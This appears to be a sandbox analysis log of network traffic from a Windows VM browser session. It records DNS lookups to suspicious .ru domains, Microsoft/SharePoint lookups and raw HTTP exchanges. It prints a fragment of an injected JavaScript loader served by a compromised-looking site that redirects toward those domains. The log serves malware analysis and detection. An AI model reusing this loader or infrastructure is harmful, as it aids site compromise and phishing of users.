                                                                                              Dec 19, 2024 14:35:50.918546915 CET1.1.1.1192.168.2.60x1802No error (0)e4x6.gurativez.ru172.67.155.68A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:50.918546915 CET1.1.1.1192.168.2.60x1802No error (0)e4x6.gurativez.ru104.21.72.213A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:51.060631037 CET1.1.1.1192.168.2.60x922No error (0)e4x6.gurativez.ru172.67.155.68A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:51.060631037 CET1.1.1.1192.168.2.60x922No error (0)e4x6.gurativez.ru104.21.72.213A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:51.060992002 CET1.1.1.1192.168.2.60x5d04No error (0)e4x6.gurativez.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.895520926 CET1.1.1.1192.168.2.60x885cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.895520926 CET1.1.1.1192.168.2.60x885cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.895520926 CET1.1.1.1192.168.2.60x885cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.895520926 CET1.1.1.1192.168.2.60x885cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.896619081 CET1.1.1.1192.168.2.60x2f2eNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.896619081 CET1.1.1.1192.168.2.60x2f2eNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.896661997 CET1.1.1.1192.168.2.60xa837No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.897116899 CET1.1.1.1192.168.2.60xd86dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.897116899 CET1.1.1.1192.168.2.60xd86dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:54.897135973 CET1.1.1.1192.168.2.60x187aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:57.223043919 CET1.1.1.1192.168.2.60x3863No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:57.223043919 CET1.1.1.1192.168.2.60x3863No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:57.223043919 CET1.1.1.1192.168.2.60x3863No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:57.223043919 CET1.1.1.1192.168.2.60x3863No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.758029938 CET1.1.1.1192.168.2.60xc131No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.758029938 CET1.1.1.1192.168.2.60xc131No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.758356094 CET1.1.1.1192.168.2.60x6830No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.766565084 CET1.1.1.1192.168.2.60xd75dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.766565084 CET1.1.1.1192.168.2.60xd75dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:35:58.766669035 CET1.1.1.1192.168.2.60xa752No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:06.384032965 CET1.1.1.1192.168.2.60x9e00No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:19.402709007 CET1.1.1.1192.168.2.60x10aeNo error (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru104.21.18.132A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:19.402709007 CET1.1.1.1192.168.2.60x10aeNo error (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru172.67.181.220A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:19.402884007 CET1.1.1.1192.168.2.60xad2eNo error (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.881674051 CET1.1.1.1192.168.2.60xbaf3No error (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru65IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.882740021 CET1.1.1.1192.168.2.60x5a0fNo error (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru172.67.181.220A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:22.882740021 CET1.1.1.1192.168.2.60x5a0fNo error (0)9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru104.21.18.132A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:23.225212097 CET1.1.1.1192.168.2.60x7139No error (0)www.sharepoint.comsharepoint.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:23.225452900 CET1.1.1.1192.168.2.60x7d2cNo error (0)www.sharepoint.comsharepoint.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.373008966 CET1.1.1.1192.168.2.60xe310No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.375741959 CET1.1.1.1192.168.2.60x5f9bNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.467297077 CET1.1.1.1192.168.2.60xfabeNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:29.809825897 CET1.1.1.1192.168.2.60x8d30No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:32.240329027 CET1.1.1.1192.168.2.60x7bbfNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:32.240444899 CET1.1.1.1192.168.2.60x817No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:33.443553925 CET1.1.1.1192.168.2.60x97a1No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:33.462153912 CET1.1.1.1192.168.2.60x566eNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:35.509690046 CET1.1.1.1192.168.2.60xa961No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 14:36:35.511169910 CET1.1.1.1192.168.2.60xbe4fNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              • alternative-magic.com
                                                                                              • cdnjs.cloudflare.com
                                                                                              • e4x6.gurativez.ru
                                                                                              • https:
                                                                                                • challenges.cloudflare.com
                                                                                                • code.jquery.com
                                                                                                • 9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru
                                                                                              • a.nel.cloudflare.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.64971569.49.245.1724436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:47 UTC691OUTGET /res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwood HTTP/1.1
                                                                                              Host: alternative-magic.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:48 UTC196INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:35:46 GMT
                                                                                              Server: Apache
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                              2024-12-19 13:35:48 UTC2034INData Raw: 37 65 36 0d 0a 20 20 20 20 76 61 72 20 79 6b 75 5a 45 68 75 4e 52 46 63 45 79 77 63 48 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 79 6b 75 5a 45 68 75 4e 52 46 63 45 79 77 63 48 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 79 6b 75 5a 45 68 75 4e 52 46 63 45 79 77 63 48 29 3b 0d 0a 79 6b 75 5a 45 68 75 4e 52 46 63 45 79 77 63 48 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                              Data Ascii: 7e6 var ykuZEhuNRFcEywcH = document.createElement("script");ykuZEhuNRFcEywcH.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(ykuZEhuNRFcEywcH);ykuZEhuNRFcEywcH.onload=function()


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              1192.168.2.64971020.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:48 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 75 4d 74 4d 34 43 32 76 55 65 66 63 69 73 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 65 36 34 33 30 34 66 61 34 61 34 61 30 62 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 305MS-CV: OuMtM4C2vUefcisL.1Context: 2be64304fa4a4a0b
                                                                                              2024-12-19 13:35:48 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                              2024-12-19 13:35:48 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 75 4d 74 4d 34 43 32 76 55 65 66 63 69 73 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 65 36 34 33 30 34 66 61 34 61 34 61 30 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: OuMtM4C2vUefcisL.2Context: 2be64304fa4a4a0b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                                                              2024-12-19 13:35:48 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 75 4d 74 4d 34 43 32 76 55 65 66 63 69 73 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 62 65 36 34 33 30 34 66 61 34 61 34 61 30 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: OuMtM4C2vUefcisL.3Context: 2be64304fa4a4a0b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:35:49 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:35:49 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 73 6e 59 32 79 4c 66 45 45 32 32 4b 68 6d 5a 34 77 4f 4c 6d 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: QsnY2yLfEE22KhmZ4wOLmQ.0Payload parsing failed.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.649716104.17.25.144436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:49 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                              Host: cdnjs.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:50 UTC952INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:35:49 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cache-Control: public, max-age=30672000
                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Content-Type-Options: nosniff
                                                                                              CF-Cache-Status: MISS
                                                                                              Expires: Tue, 09 Dec 2025 13:35:49 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARf1%2B9aDMWHL%2FY9j%2F0Sfq%2BiOwnNycGSxfmfMtX7o6kJ4OwAHrKmU7kRP1Sx8jDtxdeobPyYR4VC8lXV%2BGCMBDOobtrbJ5VmwqWrq2O1%2BEqUf8Vwz3yYfotxHLsuudMoiNbuYV2dL"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c7301f3743cf-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:35:50 UTC417INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                              Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52
                                                                                              Data Ascii: .crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getR
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76
                                                                                              Data Ascii: ++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){v
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b
                                                                                              Data Ascii: s._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c
                                                                                              Data Ascii: :++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)|0,
                                                                                              2024-12-19 13:35:50 UTC1369INData Raw: 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33
                                                                                              Data Ascii: 0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((6553
